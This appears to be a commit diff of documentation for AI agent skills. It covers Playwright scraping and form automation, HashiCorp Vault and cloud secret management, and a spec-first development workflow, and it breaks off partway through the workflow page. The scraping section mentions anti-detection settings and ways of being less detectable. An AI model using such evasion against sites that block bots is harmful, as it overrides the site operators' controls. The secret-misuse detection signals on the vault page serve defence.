SPAs render content client-side. Wait for the actual content, not the page load:
```python
await page.goto(url)
# Wait for the data to render, not just the shell
await page.wait_for_selector("div.product-list article", state="attached")
```
#### AJAX / Fetch Waiting
Intercept and wait for specific API calls:
```python
async with page.expect_response("**/api/products*") as response_info:
await page.click("button.load-more")
response = await response_info.value
data = await response.json() # You can use the API data directly
```
#### Shadow DOM Traversal
```python
# Playwright pierces open Shadow DOM automatically with >>
await page.locator("custom-element >> .inner-class").click()
```
#### Lazy-Loaded Images
Scroll elements into view to trigger lazy loading:
```python
images = await page.query_selector_all("img[data-src]")
for img in images:
await img.scroll_into_view_if_needed()
await page.wait_for_timeout(200)
```
### 8. Error Handling & Retry Logic
#### Retry Decorator Pattern
```python
import asyncio
async def with_retry(coro_factory, max_retries=3, backoff_base=2):
for attempt in range(max_retries):
try:
return await coro_factory()
except Exception as e:
if attempt == max_retries - 1:
raise
wait = backoff_base ** attempt
print(f"Attempt {attempt + 1} failed: {e}. Retrying in {wait}s...")
await asyncio.sleep(wait)
```
#### Handling Common Failures
```python
from playwright.async_api import TimeoutError as PlaywrightTimeout
try:
await page.click("button.submit", timeout=5000)
except PlaywrightTimeout:
# Element did not appear — page structure may have changed
# Try fallback selector
await page.click("[type='submit']", timeout=5000)
except Exception as e:
# Network error, browser crash, etc.
await page.screenshot(path="error-state.png")
raise
```
#### Rate Limit Detection
```python
async def check_rate_limit(response):
if response.status == 429:
retry_after = response.headers.get("retry-after", "60")
wait_seconds = int(retry_after)
print(f"Rate limited. Waiting {wait_seconds}s...")
await asyncio.sleep(wait_seconds)
return True
return False
```
## Workflows
### Workflow 1: Single-Page Data Extraction
**Scenario:** Extract product data from a single page with JavaScript-rendered content.
**Steps:**
1. Launch browser in headed mode during development (`headless=False`), switch to headless for production
2. Navigate to URL and wait for content selector
3. Extract data using `query_selector_all` with field mapping
4. Validate extracted data (check for nulls, expected types)
5. Output as JSON
```python
async def extract_single_page(url, selectors):
async with async_playwright() as p:
browser = await p.chromium.launch(headless=True)
context = await browser.new_context(
viewport={"width": 1920, "height": 1080},
user_agent="Mozilla/5.0 ..."
)
page = await context.new_page()
await page.goto(url, wait_until="networkidle")
data = await extract_listings(page, selectors["container"], selectors["fields"])
await browser.close()
return data
```
### Workflow 2: Multi-Page Scraping with Pagination
**Scenario:** Scrape search results across 50+ pages.
**Steps:**
1. Launch browser with anti-detection settings
2. Navigate to first page
3. Extract data from current page
4. Check if "Next" button exists and is enabled
5. Click next, wait for new content to load (not just navigation)
6. Repeat until no next page or max pages reached
7. Deduplicate results by unique key
8. Write output incrementally (don't hold everything in memory)
```python
async def scrape_paginated(base_url, selectors, max_pages=100):
all_data = []
async with async_playwright() as p:
browser = await p.chromium.launch(headless=True)
page = await (await browser.new_context()).new_page()
await page.goto(base_url)
for page_num in range(max_pages):
items = await extract_listings(page, selectors["container"], selectors["fields"])
all_data.extend(items)
next_btn = page.locator(selectors["next_button"])
if await next_btn.count() == 0 or await next_btn.is_disabled():
break
await next_btn.click()
await page.wait_for_selector(selectors["container"])
await human_delay(800, 2000)
await browser.close()
return all_data
```
### Workflow 3: Authenticated Workflow Automation
**Scenario:** Log into a portal, navigate a multi-step form, download a report.
**Steps:**
1. Check for existing session state file
2. If no session, perform login and save state
3. Navigate to target page using saved session
4. Fill multi-step form with provided data
5. Wait for download to trigger
6. Save downloaded file to target directory
```python
async def authenticated_workflow(credentials, form_data, download_dir):
async with async_playwright() as p:
browser = await p.chromium.launch(headless=True)
state_file = "session_state.json"
# Restore or create session
if os.path.exists(state_file):
context = await browser.new_context(storage_state=state_file)
else:
context = await browser.new_context()
page = await context.new_page()
await login(page, credentials["url"], credentials["user"], credentials["pass"])
await context.storage_state(path=state_file)
page = await context.new_page()
await page.goto(form_data["target_url"])
# Fill form steps
for step_fn in [fill_step_1, fill_step_2]:
await step_fn(page, form_data)
# Handle download
async with page.expect_download() as dl_info:
await page.click("button:has-text('Download Report')")
download = await dl_info.value
await download.save_as(os.path.join(download_dir, download.suggested_filename))
await browser.close()
```
## Tools Reference
| Script | Purpose | Key Flags | Output |
|--------|---------|-----------|--------|
| `scraping_toolkit.py` | Generate Playwright scraping script skeleton | `--url`, `--selectors`, `--paginate`, `--output` | Python script or JSON config |
| `form_automation_builder.py` | Generate form-fill automation script from field spec | `--fields`, `--url`, `--output` | Python automation script |
| `anti_detection_checker.py` | Audit a Playwright script for detection vectors | `--file`, `--verbose` | Risk report with score |
All scripts are stdlib-only. Run `python3 <script> --help` for full usage.
## Anti-Patterns
### Hardcoded Waits
**Bad:** `await page.wait_for_timeout(5000)` before every action.
**Good:** Use `wait_for_selector`, `wait_for_url`, `expect_response`, or `wait_for_load_state`. Hardcoded waits are flaky and slow.
### No Error Recovery
**Bad:** Linear script that crashes on first failure.
**Good:** Wrap each page interaction in try/except. Take error-state screenshots. Implement retry with exponential backoff.
### Ignoring robots.txt
**Bad:** Scraping without checking robots.txt directives.
**Good:** Fetch and parse robots.txt before scraping. Respect `Crawl-delay`. Skip disallowed paths. Add your bot name to User-Agent if running at scale.
### Storing Credentials in Scripts
**Bad:** Hardcoding usernames and passwords in Python files.
**Good:** Use environment variables, `.env` files (gitignored), or a secrets manager. Pass credentials via CLI arguments.
### No Rate Limiting
**Bad:** Hammering a site with 100 requests/second.
**Good:** Add random delays between requests (1-3s for polite scraping). Monitor for 429 responses. Implement exponential backoff.
### Selector Fragility
**Bad:** Relying on auto-generated class names (`.css-1a2b3c`) or deep nesting (`div > div > div > span:nth-child(3)`).
**Good:** Use data attributes, semantic HTML, or text-based locators. Test selectors in browser DevTools first.
### Not Cleaning Up Browser Instances
**Bad:** Launching browsers without closing them, leading to resource leaks.
**Good:** Always use `try/finally` or async context managers to ensure `browser.close()` is called.
### Running Headed in Production
**Bad:** Using `headless=False` in production/CI.
**Good:** Develop with headed mode for debugging, deploy with `headless=True`. Use environment variable to toggle: `headless = os.environ.get("HEADLESS", "true") == "true"`.
## Cross-References
- **playwright-pro** — Browser testing skill. Use for E2E tests, test assertions, test fixtures. Browser Automation is for data extraction and workflow automation, not testing.
- **api-test-suite-builder** — When the website has a public API, hit the API directly instead of scraping the rendered page. Faster, more reliable, less detectable.
- **performance-profiler** — If your automation scripts are slow, profile the bottlenecks before adding concurrency.
- **env-secrets-manager** — For securely managing credentials used in authenticated automation workflows.

View File

@@ -1,13 +1,13 @@
---
title: "Engineering - POWERFUL Skills — Agent Skills & Codex Plugins"
description: "44 engineering - powerful skills — advanced agent-native skill and Claude Code plugin for AI agent design, infrastructure, and automation. Works with Claude Code, Codex CLI, Gemini CLI, and OpenClaw."
description: "46 engineering - powerful skills — advanced agent-native skill and Claude Code plugin for AI agent design, infrastructure, and automation. Works with Claude Code, Codex CLI, Gemini CLI, and OpenClaw."
---
<div class="domain-header" markdown>
# :material-rocket-launch: Engineering - POWERFUL
<p class="domain-count">44 skills in this domain</p>
<p class="domain-count">46 skills in this domain</p>
</div>
@@ -53,6 +53,12 @@ description: "44 engineering - powerful skills — advanced agent-native skill a
> You sleep. The agent experiments. You wake up to results.
- **[Browser Automation - POWERFUL](browser-automation.md)**
---
The Browser Automation skill provides comprehensive tools and knowledge for building production-grade web automation ...
- **[Changelog Generator](changelog-generator.md)**
---
@@ -185,6 +191,12 @@ description: "44 engineering - powerful skills — advanced agent-native skill a
Tier: POWERFUL
- **[Secrets Vault Manager](secrets-vault-manager.md)**
---
Tier: POWERFUL
- **[Skill Security Auditor](skill-security-auditor.md)**
---
@@ -197,6 +209,18 @@ description: "44 engineering - powerful skills — advanced agent-native skill a
---
- **[Spec-Driven Workflow — POWERFUL](spec-driven-workflow.md)**
---
Spec-driven workflow enforces a single, non-negotiable rule: write the specification BEFORE you write any code. Not a...
- **[SQL Database Assistant - POWERFUL Tier Skill](sql-database-assistant.md)**
---
The operational companion to database design. While database-designer focuses on schema architecture and database-sch...
- **[Tech Debt Tracker](tech-debt-tracker.md)**
---

View File

@@ -0,0 +1,414 @@
---
title: "Secrets Vault Manager — Agent Skill for Codex & OpenClaw"
description: "Use when the user asks to set up secret management infrastructure, integrate HashiCorp Vault, configure cloud secret stores (AWS Secrets Manager. Agent skill for Claude Code, Codex CLI, Gemini CLI, OpenClaw."
---
# Secrets Vault Manager
<div class="page-meta" markdown>
<span class="meta-badge">:material-rocket-launch: Engineering - POWERFUL</span>
<span class="meta-badge">:material-identifier: `secrets-vault-manager`</span>
<span class="meta-badge">:material-github: <a href="https://github.com/alirezarezvani/claude-skills/tree/main/engineering/secrets-vault-manager/SKILL.md">Source</a></span>
</div>
<div class="install-banner" markdown>
<span class="install-label">Install:</span> <code>claude /plugin install engineering-advanced-skills</code>
</div>
**Tier:** POWERFUL
**Category:** Engineering
**Domain:** Security / Infrastructure / DevOps
---
## Overview
Production secret infrastructure management for teams running HashiCorp Vault, cloud-native secret stores, or hybrid architectures. This skill covers policy authoring, auth method configuration, automated rotation, dynamic secrets, audit logging, and incident response.
**Distinct from env-secrets-manager** which handles local `.env` file hygiene and leak detection. This skill operates at the infrastructure layer — Vault clusters, cloud KMS, certificate authorities, and CI/CD secret injection.
### When to Use
- Standing up a new Vault cluster or migrating to a managed secret store
- Designing auth methods for services, CI runners, and human operators
- Implementing automated credential rotation (database, API keys, certificates)
- Auditing secret access patterns for compliance (SOC 2, ISO 27001, HIPAA)
- Responding to a secret leak that requires mass revocation
- Integrating secrets into Kubernetes workloads or CI/CD pipelines
---
## HashiCorp Vault Patterns
### Architecture Decisions
| Decision | Recommendation | Rationale |
|----------|---------------|-----------|
| Deployment mode | HA with Raft storage | No external dependency, built-in leader election |
| Auto-unseal | Cloud KMS (AWS KMS / Azure Key Vault / GCP KMS) | Eliminates manual unseal, enables automated restarts |
| Namespaces | One per environment (dev/staging/prod) | Blast-radius isolation, independent policies |
| Audit devices | File + syslog (dual) | Vault refuses requests if all audit devices fail — dual prevents outages |
### Auth Methods
**AppRole** — Machine-to-machine authentication for services and batch jobs.
```hcl
# Enable AppRole
path "auth/approle/*" {
capabilities = ["create", "read", "update", "delete", "list"]
}
# Application-specific role
vault write auth/approle/role/payment-service \
token_ttl=1h \
token_max_ttl=4h \
secret_id_num_uses=1 \
secret_id_ttl=10m \
token_policies="payment-service-read"
```
**Kubernetes** — Pod-native authentication via service account tokens.
```hcl
vault write auth/kubernetes/role/api-server \
bound_service_account_names=api-server \
bound_service_account_namespaces=production \
policies=api-server-secrets \
ttl=1h
```
**OIDC** — Human operator access via SSO provider (Okta, Azure AD, Google Workspace).
```hcl
vault write auth/oidc/role/engineering \
bound_audiences="vault" \
allowed_redirect_uris="https://vault.example.com/ui/vault/auth/oidc/oidc/callback" \
user_claim="email" \
oidc_scopes="openid,profile,email" \
policies="engineering-read" \
ttl=8h
```
### Secret Engines
| Engine | Use Case | TTL Strategy |
|--------|----------|-------------|
| KV v2 | Static secrets (API keys, config) | Versioned, manual rotation |
| Database | Dynamic DB credentials | 1h default, 24h max |
| PKI | TLS certificates | 90d leaf certs, 5y intermediate CA |
| Transit | Encryption-as-a-service | Key rotation every 90d |
| SSH | Signed SSH certificates | 30m for interactive, 8h for automation |
### Policy Design
Follow least-privilege with path-based granularity:
```hcl
# payment-service-read policy
path "secret/data/production/payment/*" {
capabilities = ["read"]
}
path "database/creds/payment-readonly" {
capabilities = ["read"]
}
# Deny access to admin paths explicitly
path "sys/*" {
capabilities = ["deny"]
}
```
**Policy naming convention:** `{service}-{access-level}` (e.g., `payment-service-read`, `api-gateway-admin`).
---
## Cloud Secret Store Integration
### Comparison Matrix
| Feature | AWS Secrets Manager | Azure Key Vault | GCP Secret Manager |
|---------|--------------------|-----------------|--------------------|
| Rotation | Built-in Lambda | Custom logic via Functions | Cloud Functions |
| Versioning | Automatic | Manual or automatic | Automatic |
| Encryption | AWS KMS (default or CMK) | HSM-backed | Google-managed or CMEK |
| Access control | IAM policies + resource policy | RBAC + Access Policies | IAM bindings |
| Cross-region | Replication supported | Geo-redundant by default | Replication supported |
| Audit | CloudTrail | Azure Monitor + Diagnostic Logs | Cloud Audit Logs |
| Pricing model | Per-secret + per-API call | Per-operation + per-key | Per-secret version + per-access |
### When to Use Which
- **AWS Secrets Manager**: RDS/Aurora credential rotation out of the box. Best when fully on AWS.
- **Azure Key Vault**: Certificate management strength. Required for Azure AD integrated workloads.
- **GCP Secret Manager**: Simplest API surface. Best for GKE-native workloads with Workload Identity.
- **HashiCorp Vault**: Multi-cloud, dynamic secrets, PKI, transit encryption. Best for complex or hybrid environments.
### SDK Access Patterns
**Principle:** Always fetch secrets at startup or via sidecar — never bake into images or config files.
```python
# AWS Secrets Manager pattern
import boto3, json
def get_secret(secret_name, region="us-east-1"):
client = boto3.client("secretsmanager", region_name=region)
response = client.get_secret_value(SecretId=secret_name)
return json.loads(response["SecretString"])
```
```python
# GCP Secret Manager pattern
from google.cloud import secretmanager
def get_secret(project_id, secret_id, version="latest"):
client = secretmanager.SecretManagerServiceClient()
name = f"projects/{project_id}/secrets/{secret_id}/versions/{version}"
response = client.access_secret_version(request={"name": name})
return response.payload.data.decode("UTF-8")
```
```python
# Azure Key Vault pattern
from azure.identity import DefaultAzureCredential
from azure.keyvault.secrets import SecretClient
def get_secret(vault_url, secret_name):
credential = DefaultAzureCredential()
client = SecretClient(vault_url=vault_url, credential=credential)
return client.get_secret(secret_name).value
```
---
## Secret Rotation Workflows
### Rotation Strategy by Secret Type
| Secret Type | Rotation Frequency | Method | Downtime Risk |
|-------------|-------------------|--------|---------------|
| Database passwords | 30 days | Dual-account swap | Zero (A/B rotation) |
| API keys | 90 days | Generate new, deprecate old | Zero (overlap window) |
| TLS certificates | 60 days before expiry | ACME or Vault PKI | Zero (graceful reload) |
| SSH keys | 90 days | Vault-signed certificates | Zero (CA-based) |
| Service tokens | 24 hours | Dynamic generation | Zero (short-lived) |
| Encryption keys | 90 days | Key versioning (rewrap) | Zero (version coexistence) |
### Database Credential Rotation (Dual-Account)
1. Two database accounts exist: `app_user_a` and `app_user_b`
2. Application currently uses `app_user_a`
3. Rotation rotates `app_user_b` password, updates secret store
4. Application switches to `app_user_b` on next credential fetch
5. After grace period, `app_user_a` password is rotated
6. Cycle repeats
### API Key Rotation (Overlap Window)
1. Generate new API key with provider
2. Store new key in secret store as `current`, move old to `previous`
3. Deploy applications — they read `current`
4. After all instances restarted (or TTL expired), revoke `previous`
5. Monitoring confirms zero usage of old key before revocation
---
## Dynamic Secrets
Dynamic secrets are generated on-demand with automatic expiration. Prefer dynamic secrets over static credentials wherever possible.
### Database Dynamic Credentials (Vault)
```hcl
# Configure database engine
vault write database/config/postgres \
plugin_name=postgresql-database-plugin \
connection_url="postgresql://{{username}}:{{password}}@db.example.com:5432/app" \
allowed_roles="app-readonly,app-readwrite" \
username="vault_admin" \
password="<admin-password>"
# Create role with TTL
vault write database/roles/app-readonly \
db_name=postgres \
creation_statements="CREATE ROLE \"{{name}}\" WITH LOGIN PASSWORD '{{password}}' VALID UNTIL '{{expiration}}'; GRANT SELECT ON ALL TABLES IN SCHEMA public TO \"{{name}}\";" \
default_ttl=1h \
max_ttl=24h
```
### Cloud IAM Dynamic Credentials
Vault can generate short-lived AWS IAM credentials, Azure service principal passwords, or GCP service account keys — eliminating long-lived cloud credentials entirely.
### SSH Certificate Authority
Replace SSH key distribution with a Vault-signed certificate model:
1. Vault acts as SSH CA
2. Users/machines request signed certificates with short TTL (30 min)
3. SSH servers trust the CA public key — no `authorized_keys` management
4. Certificates expire automatically — no revocation needed for normal operations
---
## Audit Logging
### What to Log
| Event | Priority | Retention |
|-------|----------|-----------|
| Secret read access | HIGH | 1 year minimum |
| Secret creation/update | HIGH | 1 year minimum |
| Auth method login | MEDIUM | 90 days |
| Policy changes | CRITICAL | 2 years (compliance) |
| Failed access attempts | CRITICAL | 1 year |
| Token creation/revocation | MEDIUM | 90 days |
| Seal/unseal operations | CRITICAL | Indefinite |
### Anomaly Detection Signals
- Secret accessed from new IP/CIDR range
- Access volume spike (>3x baseline for a path)
- Off-hours access for human auth methods
- Service accessing secrets outside its policy scope (denied requests)
- Multiple failed auth attempts from single source
- Token created with unusually long TTL
### Compliance Reporting
Generate periodic reports covering:
1. **Access inventory** — Which identities accessed which secrets, when
2. **Rotation compliance** — Secrets overdue for rotation
3. **Policy drift** — Policies modified since last review
4. **Orphaned secrets** — Secrets with no recent access (>90 days)
Use `audit_log_analyzer.py` to parse Vault or cloud audit logs for these signals.
---
## Emergency Procedures
### Secret Leak Response (Immediate)
**Time target: Contain within 15 minutes of detection.**
1. **Identify scope** — Which secret(s) leaked, where (repo, log, error message, third party)
2. **Revoke immediately** — Rotate the compromised credential at the source (provider API, Vault, cloud SM)
3. **Invalidate tokens** — Revoke all Vault tokens that accessed the leaked secret
4. **Audit blast radius** — Query audit logs for usage of the compromised secret in the exposure window
5. **Notify stakeholders** — Security team, affected service owners, compliance (if PII/regulated data)
6. **Post-mortem** — Document root cause, update controls to prevent recurrence
### Vault Seal Operations
**When to seal:** Active security incident affecting Vault infrastructure, suspected key compromise.
**Sealing** stops all Vault operations. Use only as last resort.
**Unseal procedure:**
1. Gather quorum of unseal key holders (Shamir threshold)
2. Or confirm auto-unseal KMS key is accessible
3. Unseal via `vault operator unseal` or restart with auto-unseal
4. Verify audit devices reconnected
5. Check active leases and token validity
See `references/emergency_procedures.md` for complete playbooks.
---
## CI/CD Integration
### Vault Agent Sidecar (Kubernetes)
Vault Agent runs alongside application pods, handles authentication and secret rendering:
```yaml
# Pod annotation for Vault Agent Injector
annotations:
vault.hashicorp.com/agent-inject: "true"
vault.hashicorp.com/role: "api-server"
vault.hashicorp.com/agent-inject-secret-db: "database/creds/app-readonly"
vault.hashicorp.com/agent-inject-template-db: |
{{- with secret "database/creds/app-readonly" -}}
postgresql://{{ .Data.username }}:{{ .Data.password }}@db:5432/app
{{- end }}
```
### External Secrets Operator (Kubernetes)
For teams preferring declarative GitOps over agent sidecars:
```yaml
apiVersion: external-secrets.io/v1beta1
kind: ExternalSecret
metadata:
name: api-credentials
spec:
refreshInterval: 1h
secretStoreRef:
name: vault-backend
kind: ClusterSecretStore
target:
name: api-credentials
data:
- secretKey: api-key
remoteRef:
key: secret/data/production/api
property: key
```
### GitHub Actions OIDC
Eliminate long-lived secrets in CI by using OIDC federation:
```yaml
- name: Authenticate to Vault
uses: hashicorp/vault-action@v2
with:
url: https://vault.example.com
method: jwt
role: github-ci
jwtGithubAudience: https://vault.example.com
secrets: |
secret/data/ci/deploy api_key | DEPLOY_API_KEY ;
secret/data/ci/deploy db_password | DB_PASSWORD
```
---
## Anti-Patterns
| Anti-Pattern | Risk | Correct Approach |
|-------------|------|-----------------|
| Hardcoded secrets in source code | Leak via repo, logs, error output | Fetch from secret store at runtime |
| Long-lived static tokens (>30 days) | Stale credentials, no accountability | Dynamic secrets or short TTL + rotation |
| Shared service accounts | No audit trail per consumer | Per-service identity with unique credentials |
| No rotation policy | Compromised creds persist indefinitely | Automated rotation on schedule |
| Secrets in environment variables on CI | Visible in build logs, process table | Vault Agent or OIDC-based injection |
| Single unseal key holder | Bus factor of 1, recovery blocked | Shamir split (3-of-5) or auto-unseal |
| No audit device configured | Zero visibility into access | Dual audit devices (file + syslog) |
| Wildcard policies (`path "*"`) | Over-permissioned, violates least privilege | Explicit path-based policies per service |
---
## Tools
| Script | Purpose |
|--------|---------|
| `vault_config_generator.py` | Generate Vault policy and auth config from application requirements |
| `rotation_planner.py` | Create rotation schedule from a secret inventory file |
| `audit_log_analyzer.py` | Analyze audit logs for anomalies and compliance gaps |
---
## Cross-References
- **env-secrets-manager** — Local `.env` file hygiene, leak detection, drift awareness
- **senior-secops** — Security operations, incident response, threat modeling
- **ci-cd-pipeline-builder** — Pipeline design where secrets are consumed
- **docker-development** — Container secret injection patterns
- **helm-chart-builder** — Kubernetes secret management in Helm charts

View File

@@ -0,0 +1,597 @@
---
title: "Spec-Driven Workflow — Agent Skill for Codex & OpenClaw"
description: "Use when the user asks to write specs before code, define acceptance criteria, plan features before implementation, generate tests from. Agent skill for Claude Code, Codex CLI, Gemini CLI, OpenClaw."
---
# Spec-Driven Workflow
<div class="page-meta" markdown>
<span class="meta-badge">:material-rocket-launch: Engineering - POWERFUL</span>
<span class="meta-badge">:material-identifier: `spec-driven-workflow`</span>
<span class="meta-badge">:material-github: <a href="https://github.com/alirezarezvani/claude-skills/tree/main/engineering/spec-driven-workflow/SKILL.md">Source</a></span>
</div>
<div class="install-banner" markdown>
<span class="install-label">Install:</span> <code>claude /plugin install engineering-advanced-skills</code>
</div>
## Overview
Spec-driven workflow enforces a single, non-negotiable rule: **write the specification BEFORE you write any code.** Not alongside. Not after. Before.
This is not documentation. This is a contract. A spec defines what the system MUST do, what it SHOULD do, and what it explicitly WILL NOT do. Every line of code you write traces back to a requirement in the spec. Every test traces back to an acceptance criterion. If it is not in the spec, it does not get built.
### Why Spec-First Matters
1. **Eliminates rework.** 60-80% of defects originate from requirements, not implementation. Catching ambiguity in a spec costs minutes; catching it in production costs days.
2. **Forces clarity.** If you cannot write what the system should do in plain language, you do not understand the problem well enough to write code.
3. **Enables parallelism.** Once a spec is approved, frontend, backend, QA, and documentation can all start simultaneously.
4. **Creates accountability.** The spec is the definition of done. No arguments about whether a feature is "complete" — either it satisfies the acceptance criteria or it does not.
5. **Feeds TDD directly.** Acceptance criteria in Given/When/Then format translate 1:1 into test cases. The spec IS the test plan.
### The Iron Law
```
NO CODE WITHOUT AN APPROVED SPEC.
NO EXCEPTIONS. NO "QUICK PROTOTYPES." NO "I'LL DOCUMENT IT LATER."
```
If the spec is not written, reviewed, and approved, implementation does not begin. Period.
---
## The Spec Format
Every spec follows this structure. No sections are optional — if a section does not apply, write "N/A — [reason]" so reviewers know it was considered, not forgotten.
### 1. Title and Context
```markdown
# Spec: [Feature Name]
**Author:** [name]
**Date:** [ISO 8601]
**Status:** Draft | In Review | Approved | Superseded
**Reviewers:** [list]
**Related specs:** [links]
## Context
[Why does this feature exist? What problem does it solve? What is the business
motivation? Include links to user research, support tickets, or metrics that
justify this work. 2-4 paragraphs maximum.]
```
### 2. Functional Requirements (RFC 2119)
Use RFC 2119 keywords precisely:
| Keyword | Meaning |
|---------|---------|
| **MUST** | Absolute requirement. Failing this means the implementation is non-conformant. |
| **MUST NOT** | Absolute prohibition. Doing this means the implementation is broken. |
| **SHOULD** | Recommended. May be omitted with documented justification. |
| **SHOULD NOT** | Discouraged. May be included with documented justification. |
| **MAY** | Optional. Purely at the implementer's discretion. |
```markdown
## Functional Requirements
- FR-1: The system MUST authenticate users via OAuth 2.0 PKCE flow.
- FR-2: The system MUST reject tokens older than 24 hours.
- FR-3: The system SHOULD support refresh token rotation.
- FR-4: The system MAY cache user profiles for up to 5 minutes.
- FR-5: The system MUST NOT store plaintext passwords under any circumstance.
```
Number every requirement. Use `FR-` prefix. Each requirement is a single, testable statement.
### 3. Non-Functional Requirements
```markdown
## Non-Functional Requirements
### Performance
- NFR-P1: Login flow MUST complete in < 500ms (p95) under normal load.
- NFR-P2: Token validation MUST complete in < 50ms (p99).
### Security
- NFR-S1: All tokens MUST be transmitted over TLS 1.2+.
- NFR-S2: The system MUST rate-limit login attempts to 5/minute per IP.
### Accessibility
- NFR-A1: Login form MUST meet WCAG 2.1 AA standards.
- NFR-A2: Error messages MUST be announced to screen readers.
### Scalability
- NFR-SC1: The system SHOULD handle 10,000 concurrent sessions.
### Reliability
- NFR-R1: The authentication service MUST maintain 99.9% uptime.
```
### 4. Acceptance Criteria (Given/When/Then)
Every functional requirement maps to one or more acceptance criteria. Use Gherkin syntax:
```markdown
## Acceptance Criteria
### AC-1: Successful login (FR-1)
Given a user with valid credentials
When they submit the login form with correct email and password
Then they receive a valid access token
And they are redirected to the dashboard
And the login event is logged with timestamp and IP
### AC-2: Expired token rejection (FR-2)
Given a user with an access token issued 25 hours ago
When they make an API request with that token
Then they receive a 401 Unauthorized response
And the response body contains error code "TOKEN_EXPIRED"
And they are NOT redirected (API clients handle their own flow)
### AC-3: Rate limiting (NFR-S2)
Given an IP address that has made 5 failed login attempts in the last minute
When a 6th login attempt arrives from that IP
Then the request is rejected with 429 Too Many Requests
And the response includes a Retry-After header
```
### 5. Edge Cases and Error Scenarios
```markdown
## Edge Cases
- EC-1: User submits login form with empty email → Show validation error, do not hit API.
- EC-2: OAuth provider is down → Show "Service temporarily unavailable", retry after 30s.
- EC-3: User has account but no password (social-only) → Redirect to social login.
- EC-4: Concurrent login from two devices → Both sessions are valid (no single-session enforcement).
- EC-5: Token expires mid-request → Complete the current request, return warning header.
```
### 6. API Contracts
Define request/response shapes using TypeScript-style notation:
```markdown
## API Contracts
### POST /api/auth/login
Request:
```typescript
interface LoginRequest {
email: string; // MUST be valid email format
password: string; // MUST be 8-128 characters
rememberMe?: boolean; // Default: false
}
```
Success Response (200):
```typescript
interface LoginResponse {
accessToken: string; // JWT, expires in 24h
refreshToken: string; // Opaque, expires in 30d
expiresIn: number; // Seconds until access token expires
user: {
id: string;
email: string;
displayName: string;
};
}
```
Error Response (401):
```typescript
interface AuthError {
error: "INVALID_CREDENTIALS" | "TOKEN_EXPIRED" | "ACCOUNT_LOCKED";
message: string;
retryAfter?: number; // Seconds, present for rate-limited responses
}
```
```
### 7. Data Models
```markdown
## Data Models
### User
| Field | Type | Constraints |
|-------|------|-------------|
| id | UUID | Primary key, auto-generated |
| email | string | Unique, max 255 chars, valid email format |
| passwordHash | string | bcrypt, never exposed via API |
| createdAt | timestamp | UTC, immutable |
| lastLoginAt | timestamp | UTC, updated on each login |
| loginAttempts | integer | Reset to 0 on successful login |
| lockedUntil | timestamp | Null if not locked |
```
### 8. Out of Scope
Explicit exclusions prevent scope creep:
```markdown
## Out of Scope
- OS-1: Multi-factor authentication (separate spec: SPEC-042)
- OS-2: Social login providers beyond Google and GitHub
- OS-3: Admin impersonation of user accounts
- OS-4: Password complexity rules beyond minimum length (deferred to v2)
- OS-5: Session management UI (users cannot see/revoke active sessions yet)
```
If someone asks for an out-of-scope item during implementation, point them to this section. Do not build it.
---
## Bounded Autonomy Rules
These rules define when an agent (human or AI) MUST stop and ask for guidance vs. when they can proceed independently.
### STOP and Ask When:
1. **Scope creep detected.** The implementation requires something not in the spec. Even if it seems obviously needed, STOP. The spec might have excluded it deliberately.
2. **Ambiguity exceeds 30%.** If you cannot determine the correct behavior from the spec for more than 30% of a given requirement, the spec is incomplete. Do not guess.
3. **Breaking changes required.** The implementation would change an existing API contract, database schema, or public interface. Always escalate.
4. **Security implications.** Any change that touches authentication, authorization, encryption, or PII handling requires explicit approval.
5. **Performance characteristics unknown.** If a requirement says "MUST complete in < 500ms" but you have no way to measure or guarantee that, escalate before implementing a guess.
6. **Cross-team dependencies.** If the spec requires coordination with another team or service, confirm the dependency before building against it.
### Continue Autonomously When:
1. **Spec is clear and unambiguous** for the current task.
2. **All acceptance criteria have passing tests** and you are refactoring internals.
3. **Changes are non-breaking** — no public API, schema, or behavior changes.
4. **Implementation is a direct translation** of a well-defined acceptance criterion.
5. **Error handling follows established patterns** already documented in the codebase.
### Escalation Protocol
When you must stop, provide:
```markdown
## Escalation: [Brief Title]
**Blocked on:** [requirement ID, e.g., FR-3]
**Question:** [Specific, answerable question — not "what should I do?"]
**Options considered:**
A. [Option] — Pros: [...] Cons: [...]
B. [Option] — Pros: [...] Cons: [...]
**My recommendation:** [A or B, with reasoning]
**Impact of waiting:** [What is blocked until this is resolved?]
```
Never escalate without a recommendation. Never present an open-ended question. Always give options.
See `references/bounded_autonomy_rules.md` for the complete decision matrix.
---
## Workflow — 6 Phases
### Phase 1: Gather Requirements
**Goal:** Understand what needs to be built and why.
1. **Interview the user.** Ask:
- What problem does this solve?
- Who are the users?
- What does success look like?
- What explicitly should NOT be built?
2. **Read existing code.** Understand the current system before proposing changes.
3. **Identify constraints.** Performance budgets, security requirements, backward compatibility.
4. **List unknowns.** Every unknown is a risk. Surface them now, not during implementation.
**Exit criteria:** You can explain the feature to someone unfamiliar with the project in 2 minutes.
### Phase 2: Write Spec
**Goal:** Produce a complete spec document following The Spec Format above.
1. Fill every section of the template. No section left blank.
2. Number all requirements (FR-*, NFR-*, AC-*, EC-*, OS-*).
3. Use RFC 2119 keywords precisely.
4. Write acceptance criteria in Given/When/Then format.
5. Define API contracts with TypeScript-style types.
6. List explicit exclusions in Out of Scope.
**Exit criteria:** The spec can be handed to a developer who was not in the requirements meeting, and they can implement the feature without asking clarifying questions.
### Phase 3: Validate Spec
**Goal:** Verify the spec is complete, consistent, and implementable.
Run `spec_validator.py` against the spec file:
```bash
python spec_validator.py --file spec.md --strict
```
Manual validation checklist:
- [ ] Every functional requirement has at least one acceptance criterion
- [ ] Every acceptance criterion is testable (no subjective language)
- [ ] API contracts cover all endpoints mentioned in requirements
- [ ] Data models cover all entities mentioned in requirements
- [ ] Edge cases cover failure modes for every external dependency
- [ ] Out of scope is explicit about what was considered and rejected
- [ ] Non-functional requirements have measurable thresholds
**Exit criteria:** Spec scores 80+ on validator, and all manual checklist items pass.
### Phase 4: Generate Tests
**Goal:** Extract test cases from acceptance criteria before writing implementation code.
Run `test_extractor.py` against the approved spec:
```bash
python test_extractor.py --file spec.md --framework pytest --output tests/
```
1. Each acceptance criterion becomes one or more test cases.
2. Each edge case becomes a test case.
3. Tests are stubs — they define the assertion but not the implementation.
4. All tests MUST fail initially (red phase of TDD).
**Exit criteria:** You have a test file where every test fails with "not implemented" or equivalent.
### Phase 5: Implement
**Goal:** Write code that makes failing tests pass, one acceptance criterion at a time.
1. Pick one acceptance criterion (start with the simplest).
2. Make its test(s) pass with minimal code.
3. Run the full test suite — no regressions.
4. Commit.
5. Pick the next acceptance criterion. Repeat.
**Rules:**
- Do NOT implement anything not in the spec.
